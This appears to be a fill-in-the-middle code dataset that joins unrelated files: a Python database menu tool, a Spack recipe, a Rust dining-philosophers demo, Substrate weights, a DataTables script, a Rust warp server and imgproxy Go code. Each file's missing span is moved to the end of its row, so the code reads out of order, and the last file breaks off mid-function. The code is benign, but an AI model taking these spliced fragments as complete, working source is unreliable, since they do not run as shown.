"[8] Generate existing folder report. (Do this after Marking database with my files).",
"[9] Fancy list generation. (Convert simple material list to list with format and links, looks for Requests.txt).",
"[10] Move folders if Category changed.",
"[11] Quit.",
]
menu_exit = False
while not menu_exit:
clear_console()
console.print("version " + global_data["version"])
console.print(menu_title + "")
for m_i in menu_items:
console.print(m_i + "")
console.print("")
user_input = input("Enter a number: ")
if user_input.isnumeric():
menu_sel = int(user_input)
if menu_sel == 1: # Create folders
create_folders(database)
if menu_sel == 2: # Download all images
download_all_images(database)
if menu_sel == 3: # Make all icons
make_all_icons(database, False)
if menu_sel == 4: # Make all icons
make_all_icons(database)
if menu_sel == 5: # Transfer all local files
transfer_all_local_files(database)
if menu_sel == 6: # Mark database with my files
mark_database_with_my_files(database)
if menu_sel == 7: # Generate folder report
generate_folder_report(database)
if menu_sel == 8: # Generate detail report
generate_detail_report(database)
if menu_sel == 9: # Fancy list generation
fancy_list_generation(database)
if menu_sel == 10: # Move folders to new category
move_folders_to_new_category(database)
if menu_sel == 11: # Quit
menu_exit = True
def main():
"""
Check location of the database and then going to main menu
:return:
"""
menu_title = " Select database file"
menu_items = []
menu_items_count = 0
menu_items_references = []
local_path = os.path.dirname(sys.argv[0])
global_data["local_path"] = local_path
global_data["source_path"] = "_source"
files = os.listdir(local_path)
for f in files:
file_details = os.path.splitext(f)
if os.path.isfile(local_path + os.sep + f) and file_details[1] == ".db":
menu_items.append(f"[{menu_items_count + 1}] {f}")
menu_items_count = menu_items_count + 1
menu_items_references.append(f)
if menu_items_count == 0:
clear_console()
console.print("Database files not found next to the application files.")
input("Press any enter to close...")
elif menu_items_count == 1:
database = CommonDatabaseAccess(
db_path=local_path + os.sep + menu_items_references[0], force=False
)
main_menu(database)
else:
menu_exit = False
while not menu_exit:
clear_console()
console.print("version " + global_data["version"])
console.print(menu_title + "")
for m_i in menu_items:
console.print(m_i + "")
console.print("")
user_input = input("Enter a number: ")
if user_input.isnumeric():
menu_sel = int(user_input)
if 0 < menu_sel <= len(menu_items_references): # Initial scan
database = CommonDatabaseAccess(
db_path=local_path
+ os.sep
+ menu_items_references[menu_sel - 1],
force=False,
)
main_menu(database)
menu_exit = True
if __name__ == "__main__":
main()
| convert_to_ugly_name |
package.py | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PrinseqLite(Package):
"""PRINSEQ will help you to preprocess your genomic or metagenomic
sequence data in FASTA or FASTQ format."""
homepage = "http://prinseq.sourceforge.net"
url = "https://sourceforge.net/projects/prinseq/files/standalone/prinseq-lite-0.20.4.tar.gz"
version('0.20.4', sha256='9b5e0dce3b7f02f09e1cc7e8a2dd77c0b133e5e35529d570ee901f53ebfeb56f')
variant('nopca', default=True, description="Graphs version without PCA")
depends_on('perl', type='run')
depends_on('perl-cairo', type='run')
depends_on('perl-digest-md5', type='run') | depends_on('perl-json', type='run')
def install(self, spec, prefix):
mkdirp(prefix.bin)
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-graphs-noPCA.pl')
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-lite.pl')
install('prinseq-graphs-noPCA.pl', prefix.bin)
install('prinseq-lite.pl', prefix.bin)
chmod = which('chmod')
chmod('+x', join_path(self.prefix.bin, 'prinseq-graphs-noPCA.pl'))
chmod('+x', join_path(self.prefix.bin, 'prinseq-lite.pl')) | |
main.rs | use std::thread;
use std::sync::{Mutex, Arc};
use std::time::Duration;
use rand::{self, Rng};
// struct que representa uma mesa com vários garfos
struct Table {
forks: Vec<Mutex<()>>,
}
// struct que representa os filósofos
struct Ph |
name: String,
// usize: tipo utilizado para indexar vetores (Table.forks)
left: usize,
right: usize,
}
// implementação da struct Philosopher
impl Philosopher {
// função new: convenção para criação de instâncias
fn new(name: &str, left: usize, right: usize) -> Philosopher {
Philosopher {
name: name.to_string(),
left: left,
right: right,
}
}
fn eat(&self, table: &Table) {
loop {
let mut rng = rand::thread_rng();
// Judith Butler pega o garfo direito e esquerdo (nesta equência)
if self.name == "Judith Butler" {
println!("{} is THINKING.", self.name);
// simulação do tempo que o filósofo gasta pensando
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is HUNGRY.", self.name);
// filósofo tenta pegar os garfos
let _left = table.forks[self.right].lock().unwrap();
let _right = table.forks[self.left].lock().unwrap();
println!("{} is EATING.", self.name);
// simulação do tempo que o filósofo gasta comendo
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is DONE EATING.", self.name);
// outros filósofos pegam o garfo esquerdo e direito (nesta sequência)
} else {
println!("{} is THINKING.", self.name);
// simulação do tempo que o filósofo gasta pensando
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is HUNGRY.", self.name);
// filósofo tenta pegar os garfos
let _left = table.forks[self.left].lock().unwrap();
let _right = table.forks[self.right].lock().unwrap();
println!("{} is EATING.", self.name);
// simulação do tempo que o filósofo gasta comendo
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is DONE EATING.", self.name);
}
}
}
}
fn main() {
// ARC: atomic reference count: para compartilhar a table entre múltiplas threads
// Mutex: forma de controlar a concorrência
let table = Arc::new(Table { forks: vec![
Mutex::new(()),
Mutex::new(()),
Mutex::new(()),
Mutex::new(()),
Mutex::new(()),
]});
// criação dos filósofos com seus respectivos nomes e garfos
let philosophers = vec![
Philosopher::new("Judith Butler", 0, 1),
Philosopher::new("Gilles Deleuze", 1, 2),
Philosopher::new("Karl Marx", 2, 3),
Philosopher::new("John Locke", 3, 4),
Philosopher::new("Michel Foucault", 0, 4),
];
// handles das threads criadas
// into_iter(): criação de um iterator que adquire ownership de cada filósofo
let handles: Vec<_> = philosophers.into_iter().map( |philosopher| {
let table = table.clone();
// criação das threads
thread::spawn(move || {
philosopher.eat(&table);
})
// coleção de elementos (handles) que a thread::spawn retorna
}).collect();
// operação join() para cada handle retornado das threads
for handle in handles {
handle.join().unwrap();
}
}
| ilosopher { |
weights.rs | // Copyright 2022 Webb Technologies Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//! Autogenerated weights for `pallet_dkg_proposal_handler`
//!
//! THIS FILE WAS AUTO-GENERATED USING THE SUBSTRATE BENCHMARK CLI VERSION 4.0.0-dev
//! DATE: 2022-03-16, STEPS: `50`, REPEAT: 10, LOW RANGE: `[]`, HIGH RANGE: `[]`
//! EXECUTION: Some(Wasm), WASM-EXECUTION: Compiled, CHAIN: Some("dev"), DB CACHE: 1024
// Executed Command:
// ./target/release/dkg-standalone-node
// benchmark
// --chain
// dev
// --execution
// wasm
// --wasm-execution
// compiled
// --pallet
// pallet-dkg-proposal-handler
// --extrinsic
// *
// --steps
// 50
// --repeat
// 10
// --json
// --output
// ./pallets/dkg-proposal-handler/src/weights.rs
#![cfg_attr(rustfmt, rustfmt_skip)]
#![allow(unused_parens)]
#![allow(unused_imports)]
use frame_support::{traits::Get, weights::Weight};
use sp_std::marker::PhantomData;
pub trait WeightInfo {
fn submit_signed_proposals(n: u32) -> Weight;
fn force_submit_unsigned_proposal() -> Weight;
}
/// Weight functions for `pallet_dkg_proposal_handler`.
pub struct WebbWeight<T>(PhantomData<T>);
impl<T: frame_system::Config>WeightInfo for WebbWeight<T> {
// Storage: DKG DKGPublicKey (r:1 w:0)
// Storage: DKGProposalHandler UnsignedProposalQueue (r:2 w:2)
// Storage: DKGProposalHandler SignedProposals (r:0 w:2)
fn submit_signed_proposals(n: u32, ) -> Weight {
(0_u64)
// Standard Error: 397_000
.saturating_add((296_117_000_u64).saturating_mul(n as Weight))
.saturating_add(T::DbWeight::get().reads(1_u64))
.saturating_add(T::DbWeight::get().reads((1_u64).saturating_mul(n as Weight)))
.saturating_add(T::DbWeight::get().writes((2_u64).saturating_mul(n as Weight)))
}
// Storage: DKGProposalHandler UnsignedProposalQueue (r:0 w:1)
fn force_submit_unsigned_proposal() -> Weight {
(2_000_000_u64)
.saturating_add(T::DbWeight::get().writes(1_u64))
}
}
impl WeightInfo for () {
fn submit_signed_proposals(_n: u32, ) -> Weight |
fn force_submit_unsigned_proposal() -> Weight {
0
}
}
| {
0
} |
custom.js | "use strict";
$(document).ready(function(){
$('#auto-fill').DataTable( {
autoFill: true
} );
$('#keytable').DataTable( {
keys: true,
autoFill: true
} );
$('#column-selector').DataTable( {
columnDefs: [ {
orderable: false,
className: 'select-checkbox',
targets: 0
} ],
select: {
style: 'os',
selector: 'td:first-child'
},
order: [[ 1, 'asc' ]],
autoFill: {
columns: ':not(:first-child)'
}
} );
var table = $('#scrolling-datatable').dataTable( {
scrollY: 400,
scrollX: true,
scrollCollapse: true,
paging: false,
autoFill: true
} );
var table = $('#basic-row-reorder').DataTable( {
rowReorder: true
} );
//full row selection
var table = $('#full-row').DataTable( {
rowReorder: {
selector: 'tr'
},
columnDefs: [
{ targets: 0, visible: false }
]
} );
// Restricted column ordering
var table = $('#rest-column').DataTable( {
rowReorder: true,
columnDefs: [
{ orderable: true, className: 'reorder', targets: 0 },
{ orderable: false, targets: '_all' }
]
} ); | dom: 'Bfrtip',
buttons: [
'copyHtml5',
'excelHtml5',
'csvHtml5',
'pdfHtml5'
]
} );
$('#column-selector').DataTable( {
dom: 'Bfrtip',
buttons: [
{
extend: 'copyHtml5',
exportOptions: {
columns: [ 0, ':visible' ]
}
},
{
extend: 'excelHtml5',
exportOptions: {
columns: ':visible'
}
},
{
extend: 'pdfHtml5',
exportOptions: {
columns: [ 0, 1, 2, 5 ]
}
},
'colvis'
]
} );
$('#excel-cust-bolder').DataTable( {
dom: 'Bfrtip',
buttons: [ {
extend: 'excelHtml5',
customize: function ( xlsx ){
var sheet = xlsx.xl.worksheets['sheet1.xml'];
// jQuery selector to add a border
$('row c[r*="10"]', sheet).attr( 's', '25' );
}
} ]
} );
$('#cust-json').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'JSON',
action: function ( e, dt, button, config ) {
var data = dt.buttons.exportData();
$.fn.dataTable.fileSave(
new Blob( [ JSON.stringify( data ) ] ),
'Export.json'
);
}
}
]
} );
$('#basic-key-table').DataTable( {
keys: true
} );
var table = $('#scrolling').DataTable( {
scrollY: 300,
paging: false,
keys: true
} );
$('#focus-cell').DataTable( {
keys: true
} );
$('#basic-scroller').DataTable( {
ajax: "../assets/json/datatable-extension/data.txt",
deferRender: true,
scrollY: 200,
scrollCollapse: true,
scroller: true
} );
$('#state-saving').DataTable( {
ajax: "../assets/json/datatable-extension/data.txt",
deferRender: true,
scrollY: 200,
scrollCollapse: true,
scroller: true,
stateSave: true
} );
$('#api').DataTable( {
ajax: "../assets/json/datatable-extension/data.txt",
deferRender: true,
scrollY: 200,
scrollCollapse: true,
scroller: true,
initComplete: function () {
this.api().row( 1000 ).scrollTo();
}
} );
$('#responsive').DataTable( {
responsive: true
} );
var table = $('#new-cons').DataTable();
// new $.fn.dataTable.Responsive( table );
$('#show-hidden-row').DataTable( {
responsive: {
details: {
display: $.fn.dataTable.Responsive.display.childRowImmediate,
type: ''
}
}
} );
$('#basic-colreorder').DataTable( {
colReorder: true
} );
$('#state-saving').dataTable( {
colReorder: true,
stateSave: true
} );
$('#real-time').dataTable( {
colReorder: {
realtime: false
}
} );
$('#custom-button').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'Add to cart',
action: function ( e, dt, node, config ) {
alert( 'Button activated' );
}
}
]
} );
$('#class-button').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'Secondary',
className: 'btn-secondary'
},
{
text: 'Success',
className: 'btn-success'
},
{
text: 'Danger',
className: 'btn-danger'
}
]
} );
$('#keyboard-btn').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'Button <u>1</u>',
key: '1',
action: function ( e, dt, node, config ) {
alert( 'Button 1 activated' );
}
},
{
text: 'Button <u><i>shift</i> 2</u>',
key: {
shiftKey: true,
key: '2'
},
action: function ( e, dt, node, config ) {
alert( 'Button 2 activated' );
}
}
]
} );
$('#multilevel-btn').DataTable( {
dom: 'Bfrtip',
buttons: [
{
extend: 'collection',
text: 'Table control',
buttons: [
{
text: 'Toggle start date',
action: function ( e, dt, node, config ) {
dt.column( -2 ).visible( ! dt.column( -2 ).visible() );
}
},
{
text: 'Toggle salary',
action: function ( e, dt, node, config ) {
dt.column( -1 ).visible( ! dt.column( -1 ).visible() );
}
},
'colvis'
]
}
]
} );
$('#pagelength-btn').DataTable( {
dom: 'Bfrtip',
lengthMenu: [
[ 10, 25, 50, -1 ],
[ '10 rows', '25 rows', '50 rows', 'Show all' ]
],
buttons: [
'pageLength'
]
} );
$('#basic-fixed-header').DataTable( {
fixedHeader: true
} );
var table = $('#fixed-header-footer').DataTable( {
fixedHeader: {
header: true,
footer: true
}
} );
}); | $('#export-button').DataTable( { |
api_server.rs | use crate::chain::Coordinate;
use crate::config::Config;
use crate::monitor::{MonitorEvent, State};
use crate::node::Status;
use futures::{SinkExt, StreamExt};
use serde::Serialize;
use std::net::SocketAddr;
use std::sync::Arc;
use warp::filters::ws::Message;
use warp::Filter; |
#[derive(Serialize)]
struct NodeResponse {
id: Option<u64>,
head: Option<Coordinate>,
version: Option<String>,
execution_client: Option<String>,
healthy: bool,
syncing: bool,
}
#[derive(Serialize, Clone)]
struct NetworkConfigResponse {
network_name: String,
seconds_per_slot: u64,
genesis_time: u64,
slots_per_epoch: u64,
}
impl From<&Config> for NetworkConfigResponse {
fn from(config: &Config) -> Self {
Self {
network_name: config.network.name.clone(),
seconds_per_slot: config.consensus_chain.seconds_per_slot,
genesis_time: config.consensus_chain.genesis_time,
slots_per_epoch: config.consensus_chain.slots_per_epoch,
}
}
}
pub struct APIServer {
state: Arc<State>,
}
macro_rules! get {
($path:literal, $handler:ident, $state:ident) => {
warp::get()
.and(warp::path($path))
.and(warp::path::end())
.and(with_state($state.clone()))
.and_then($handler)
};
}
impl APIServer {
pub fn new(state: Arc<State>) -> Self {
Self { state }
}
pub async fn run(&self, addr: impl Into<SocketAddr>) {
let state = self.state.clone();
let network_config = get!("network-config", serve_network_config, state);
let nodes = get!("nodes", get_nodes, state);
// let chain = get!("chain", get_chain_data, state);
// // let fork_choice = get!("fork-choice", get_fork_choice, state);
// let participation = get!("participation", serve_participation_data, state);
// let deposit_contract = get!("deposit-contract", serve_deposit_contract_data, state);
// let weak_subjectivity = get!("weak-subjectivity", serve_weak_subjectivity_data, state);
let connect = warp::path("connect")
.and(with_state(state.clone()))
.and(warp::ws())
.map(|state: Arc<State>, ws: warp::ws::Ws| {
let mut rx = state.events_tx.subscribe();
ws.on_upgrade(|mut socket| async move {
loop {
tokio::select! {
result = rx.recv() => {
match result {
Ok(event) => {
match event {
head @ MonitorEvent::NewHead { .. } => {
match serde_json::to_string(&head) {
Ok(msg) => {
let msg = Message::text(msg);
match socket.send(msg).await {
Ok(_) => {}
Err(err) => log::warn!(
"error sending ws message to client: {:?}",
err
),
}
}
Err(err) => {
log::warn!("error serializing head update: {:?}", err);
}
}
}
}
}
Err(err) => {
log::warn!("error receiving update: {:?}", err);
}
}
}
msg = socket.next() => {
match msg {
Some(Ok(msg)) => {
if msg.is_close() {
log::debug!("ws client disconnecting");
break;
}
}
Some(Err(err)) => {
log::warn!("error receiving ws message from client: {:?}", err);
break;
}
None => break,
}
}
}
}
})
});
let api = warp::get()
.and(warp::path("api"))
.and(warp::path("v1"))
.and(
network_config
.or(nodes)
.or(connect)
// .or(chain)
// .or(fork_choice)
// .or(participation)
// .or(deposit_contract)
// .or(weak_subjectivity),
);
let html_dir = state.config.monitor.output_dir.clone();
let app = warp::get().and(warp::any()).and(warp::fs::dir(html_dir));
let routes = api.or(app);
warp::serve(routes).run(addr).await
}
}
fn with_state(
state: Arc<State>,
) -> impl Filter<Extract = (Arc<State>,), Error = std::convert::Infallible> + Clone {
warp::any().map(move || state.clone())
}
async fn get_nodes(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
let nodes = state
.nodes
.iter()
.map(|node| {
let node = node.state.lock().expect("can read");
NodeResponse {
id: node.id,
head: node.head,
version: node.version.clone(),
execution_client: node.execution_description.clone(),
healthy: matches!(node.status, Status::Healthy | Status::Syncing),
syncing: matches!(node.status, Status::Syncing),
}
})
.collect::<Vec<_>>();
Ok(warp::reply::json(&nodes))
}
async fn serve_network_config(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
let network_config: NetworkConfigResponse = (&state.config).into();
Ok(warp::reply::json(&network_config))
}
// async fn get_chain_data(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
// // let status = state.chain.get_status();
// let status: FinalityData = Default::default();
// Ok(warp::reply::json(&status))
// }
// async fn get_fork_choice(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
// let state = state.lock().expect("can read state");
// let tree = state.fork_choice.tree.read().expect("has data");
// Ok(warp::reply::json(&*tree))
// }
// async fn serve_participation_data(_state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
// let response: Vec<String> = vec![];
// Ok(warp::reply::json(&response))
// }
// async fn serve_deposit_contract_data(
// _state: Arc<State>,
// ) -> Result<impl warp::Reply, warp::Rejection> {
// Ok(warp::reply::json(&"todo"))
// }
// async fn serve_weak_subjectivity_data(
// _state: Arc<State>,
// ) -> Result<impl warp::Reply, warp::Rejection> {
// Ok(warp::reply::json(&"todo"))
// } | |
process.go | package main
import (
"bytes"
"context"
"fmt"
"math"
"runtime"
"github.com/imgproxy/imgproxy/v2/imagemeta"
)
const (
msgSmartCropNotSupported = "Smart crop is not supported by used version of libvips"
// https://chromium.googlesource.com/webm/libwebp/+/refs/heads/master/src/webp/encode.h#529
webpMaxDimension = 16383.0
)
var errConvertingNonSvgToSvg = newError(422, "Converting non-SVG images to SVG is not supported", "Converting non-SVG images to SVG is not supported")
func imageTypeLoadSupport(imgtype imageType) bool {
return imgtype == imageTypeSVG ||
imgtype == imageTypeICO ||
vipsTypeSupportLoad[imgtype]
}
func imageTypeSaveSupport(imgtype imageType) bool {
return imgtype == imageTypeSVG || vipsTypeSupportSave[imgtype]
}
func imageTypeGoodForWeb(imgtype imageType) bool {
return imgtype != imageTypeTIFF &&
imgtype != imageTypeBMP
}
func canSwitchFormat(src, dst, want imageType) bool {
return imageTypeSaveSupport(want) &&
(!vipsSupportAnimation(src) ||
(dst != imageTypeUnknown && !vipsSupportAnimation(dst)) ||
vipsSupportAnimation(want))
}
func extractMeta(img *vipsImage, baseAngle int, useOrientation bool) (int, int, int, bool) {
width := img.Width()
height := img.Height()
angle := 0
flip := false
if useOrientation {
orientation := img.Orientation()
if orientation == 3 || orientation == 4 {
angle = 180
}
if orientation == 5 || orientation == 6 {
angle = 90
}
if orientation == 7 || orientation == 8 {
angle = 270
}
if orientation == 2 || orientation == 4 || orientation == 5 || orientation == 7 {
flip = true
}
}
if (angle+baseAngle)%180 != 0 {
width, height = height, width
}
return width, height, angle, flip
}
func calcScale(width, height int, po *processingOptions, imgtype imageType) float64 {
var shrink float64
srcW, srcH := float64(width), float64(height)
dstW, dstH := float64(po.Width), float64(po.Height)
if po.Width == 0 {
dstW = srcW
}
if po.Height == 0 {
dstH = srcH
}
if dstW == srcW && dstH == srcH {
shrink = 1
} else {
wshrink := srcW / dstW
hshrink := srcH / dstH
rt := po.ResizingType
if rt == resizeAuto {
srcD := width - height
dstD := po.Width - po.Height
if (srcD >= 0 && dstD >= 0) || (srcD < 0 && dstD < 0) {
rt = resizeFill
} else {
rt = resizeFit
}
}
switch {
case po.Width == 0:
shrink = hshrink
case po.Height == 0:
shrink = wshrink
case rt == resizeFit:
shrink = math.Max(wshrink, hshrink)
default:
shrink = math.Min(wshrink, hshrink)
}
}
if !po.Enlarge && shrink < 1 && imgtype != imageTypeSVG {
shrink = 1
}
shrink /= po.Dpr
if shrink > srcW {
shrink = srcW
}
if shrink > srcH {
shrink = srcH
}
return 1.0 / shrink
}
func canScaleOnLoad(imgtype imageType, scale float64) bool {
if imgtype == imageTypeSVG {
return true
}
if conf.DisableShrinkOnLoad || scale >= 1 {
return false
}
return imgtype == imageTypeJPEG || imgtype == imageTypeWEBP
}
func canFitToBytes(imgtype imageType) bool {
switch imgtype {
case imageTypeJPEG, imageTypeWEBP, imageTypeAVIF, imageTypeTIFF:
return true
default:
return false
}
}
func calcJpegShink(scale float64, imgtype imageType) int {
shrink := int(1.0 / scale)
switch {
case shrink >= 8:
return 8
case shrink >= 4:
return 4
case shrink >= 2:
return 2
}
return 1
}
func calcCropSize(orig int, crop float64) int |
func calcPosition(width, height, innerWidth, innerHeight int, gravity *gravityOptions, allowOverflow bool) (left, top int) {
if gravity.Type == gravityFocusPoint {
pointX := scaleInt(width, gravity.X)
pointY := scaleInt(height, gravity.Y)
left = pointX - innerWidth/2
top = pointY - innerHeight/2
} else {
offX, offY := int(gravity.X), int(gravity.Y)
left = (width-innerWidth+1)/2 + offX
top = (height-innerHeight+1)/2 + offY
if gravity.Type == gravityNorth || gravity.Type == gravityNorthEast || gravity.Type == gravityNorthWest {
top = 0 + offY
}
if gravity.Type == gravityEast || gravity.Type == gravityNorthEast || gravity.Type == gravitySouthEast {
left = width - innerWidth - offX
}
if gravity.Type == gravitySouth || gravity.Type == gravitySouthEast || gravity.Type == gravitySouthWest {
top = height - innerHeight - offY
}
if gravity.Type == gravityWest || gravity.Type == gravityNorthWest || gravity.Type == gravitySouthWest {
left = 0 + offX
}
}
var minX, maxX, minY, maxY int
if allowOverflow {
minX, maxX = -innerWidth+1, width-1
minY, maxY = -innerHeight+1, height-1
} else {
minX, maxX = 0, width-innerWidth
minY, maxY = 0, height-innerHeight
}
left = maxInt(minX, minInt(left, maxX))
top = maxInt(minY, minInt(top, maxY))
return
}
func cropImage(img *vipsImage, cropWidth, cropHeight int, gravity *gravityOptions) error {
if cropWidth == 0 && cropHeight == 0 {
return nil
}
imgWidth, imgHeight := img.Width(), img.Height()
cropWidth = minNonZeroInt(cropWidth, imgWidth)
cropHeight = minNonZeroInt(cropHeight, imgHeight)
if cropWidth >= imgWidth && cropHeight >= imgHeight {
return nil
}
if gravity.Type == gravitySmart {
if err := img.CopyMemory(); err != nil {
return err
}
if err := img.SmartCrop(cropWidth, cropHeight); err != nil {
return err
}
// Applying additional modifications after smart crop causes SIGSEGV on Alpine
// so we have to copy memory after it
return img.CopyMemory()
}
left, top := calcPosition(imgWidth, imgHeight, cropWidth, cropHeight, gravity, false)
return img.Crop(left, top, cropWidth, cropHeight)
}
func prepareWatermark(wm *vipsImage, wmData *imageData, opts *watermarkOptions, imgWidth, imgHeight int) error {
if err := wm.Load(wmData.Data, wmData.Type, 1, 1.0, 1); err != nil {
return err
}
po := newProcessingOptions()
po.ResizingType = resizeFit
po.Dpr = 1
po.Enlarge = true
po.Format = wmData.Type
if opts.Scale > 0 {
po.Width = maxInt(scaleInt(imgWidth, opts.Scale), 1)
po.Height = maxInt(scaleInt(imgHeight, opts.Scale), 1)
}
if err := transformImage(context.Background(), wm, wmData.Data, po, wmData.Type); err != nil {
return err
}
if err := wm.EnsureAlpha(); err != nil {
return nil
}
if opts.Replicate {
return wm.Replicate(imgWidth, imgHeight)
}
left, top := calcPosition(imgWidth, imgHeight, wm.Width(), wm.Height(), &opts.Gravity, true)
return wm.Embed(imgWidth, imgHeight, left, top, rgbColor{0, 0, 0}, true)
}
func applyWatermark(img *vipsImage, wmData *imageData, opts *watermarkOptions, framesCount int) error {
if err := img.RgbColourspace(); err != nil {
return err
}
if err := img.CopyMemory(); err != nil {
return err
}
wm := new(vipsImage)
defer wm.Clear()
width := img.Width()
height := img.Height()
if err := prepareWatermark(wm, wmData, opts, width, height/framesCount); err != nil {
return err
}
if framesCount > 1 {
if err := wm.Replicate(width, height); err != nil {
return err
}
}
opacity := opts.Opacity * conf.WatermarkOpacity
return img.ApplyWatermark(wm, opacity)
}
func copyMemoryAndCheckTimeout(ctx context.Context, img *vipsImage) error {
err := img.CopyMemory()
checkTimeout(ctx)
return err
}
func transformImage(ctx context.Context, img *vipsImage, data []byte, po *processingOptions, imgtype imageType) error {
var (
err error
trimmed bool
)
if po.Trim.Enabled {
if err = img.Trim(po.Trim.Threshold, po.Trim.Smart, po.Trim.Color, po.Trim.EqualHor, po.Trim.EqualVer); err != nil {
return err
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
trimmed = true
}
srcWidth, srcHeight, angle, flip := extractMeta(img, po.Rotate, po.AutoRotate)
cropWidth := calcCropSize(srcWidth, po.Crop.Width)
cropHeight := calcCropSize(srcHeight, po.Crop.Height)
cropGravity := po.Crop.Gravity
if cropGravity.Type == gravityUnknown {
cropGravity = po.Gravity
}
widthToScale := minNonZeroInt(cropWidth, srcWidth)
heightToScale := minNonZeroInt(cropHeight, srcHeight)
scale := calcScale(widthToScale, heightToScale, po, imgtype)
if cropWidth > 0 {
cropWidth = maxInt(1, scaleInt(cropWidth, scale))
}
if cropHeight > 0 {
cropHeight = maxInt(1, scaleInt(cropHeight, scale))
}
if cropGravity.Type != gravityFocusPoint {
cropGravity.X *= scale
cropGravity.Y *= scale
}
if !trimmed && scale != 1 && data != nil && canScaleOnLoad(imgtype, scale) {
jpegShrink := calcJpegShink(scale, imgtype)
if imgtype != imageTypeJPEG || jpegShrink != 1 {
// Do some scale-on-load
if err = img.Load(data, imgtype, jpegShrink, scale, 1); err != nil {
return err
}
}
// Update scale after scale-on-load
newWidth, newHeight, _, _ := extractMeta(img, po.Rotate, po.AutoRotate)
if srcWidth > srcHeight {
scale = float64(srcWidth) * scale / float64(newWidth)
} else {
scale = float64(srcHeight) * scale / float64(newHeight)
}
if srcWidth == scaleInt(srcWidth, scale) && srcHeight == scaleInt(srcHeight, scale) {
scale = 1.0
}
}
if err = img.Rad2Float(); err != nil {
return err
}
iccImported := false
convertToLinear := conf.UseLinearColorspace && scale != 1
if convertToLinear || !img.IsSRGB() {
if err = img.ImportColourProfile(); err != nil {
return err
}
iccImported = true
}
if convertToLinear {
if err = img.LinearColourspace(); err != nil {
return err
}
} else {
if err = img.RgbColourspace(); err != nil {
return err
}
}
hasAlpha := img.HasAlpha()
if scale != 1 {
if err = img.Resize(scale, hasAlpha); err != nil {
return err
}
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
if err = img.Rotate(angle); err != nil {
return err
}
if flip {
if err = img.Flip(); err != nil {
return err
}
}
if err = img.Rotate(po.Rotate); err != nil {
return err
}
dprWidth := scaleInt(po.Width, po.Dpr)
dprHeight := scaleInt(po.Height, po.Dpr)
if err = cropImage(img, cropWidth, cropHeight, &cropGravity); err != nil {
return err
}
if err = cropImage(img, dprWidth, dprHeight, &po.Gravity); err != nil {
return err
}
if po.Format == imageTypeWEBP {
webpLimitShrink := float64(maxInt(img.Width(), img.Height())) / webpMaxDimension
if webpLimitShrink > 1.0 {
if err = img.Resize(1.0/webpLimitShrink, hasAlpha); err != nil {
return err
}
logWarning("WebP dimension size is limited to %d. The image is rescaled to %dx%d", int(webpMaxDimension), img.Width(), img.Height())
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
}
}
keepProfile := !po.StripColorProfile && po.Format.SupportsColourProfile()
if iccImported {
if keepProfile {
// We imported ICC profile and want to keep it,
// so we need to export it
if err = img.ExportColourProfile(); err != nil {
return err
}
} else {
// We imported ICC profile but don't want to keep it,
// so we need to export image to sRGB for maximum compatibility
if err = img.ExportColourProfileToSRGB(); err != nil {
return err
}
}
} else if !keepProfile {
// We don't import ICC profile and don't want to keep it,
// so we need to transform it to sRGB for maximum compatibility
if err = img.TransformColourProfile(); err != nil {
return err
}
}
if err = img.RgbColourspace(); err != nil {
return err
}
if !keepProfile {
if err = img.RemoveColourProfile(); err != nil {
return err
}
}
transparentBg := po.Format.SupportsAlpha() && !po.Flatten
if hasAlpha && !transparentBg {
if err = img.Flatten(po.Background); err != nil {
return err
}
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
if po.Blur > 0 {
if err = img.Blur(po.Blur); err != nil {
return err
}
}
if po.Sharpen > 0 {
if err = img.Sharpen(po.Sharpen); err != nil {
return err
}
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
if po.Extend.Enabled && (dprWidth > img.Width() || dprHeight > img.Height()) {
offX, offY := calcPosition(dprWidth, dprHeight, img.Width(), img.Height(), &po.Extend.Gravity, false)
if err = img.Embed(dprWidth, dprHeight, offX, offY, po.Background, transparentBg); err != nil {
return err
}
}
if po.Padding.Enabled {
paddingTop := scaleInt(po.Padding.Top, po.Dpr)
paddingRight := scaleInt(po.Padding.Right, po.Dpr)
paddingBottom := scaleInt(po.Padding.Bottom, po.Dpr)
paddingLeft := scaleInt(po.Padding.Left, po.Dpr)
if err = img.Embed(
img.Width()+paddingLeft+paddingRight,
img.Height()+paddingTop+paddingBottom,
paddingLeft,
paddingTop,
po.Background,
transparentBg,
); err != nil {
return err
}
}
if po.Watermark.Enabled && watermark != nil {
if err = applyWatermark(img, watermark, &po.Watermark, 1); err != nil {
return err
}
}
if len(po.URLWatermarks) > 0 {
for _, v := range po.URLWatermarks {
if v.Enabled {
var imgData *imageData
if imgData, err = remoteImageData(v.ImageURL, "url_watermark"); err != nil {
return err
}
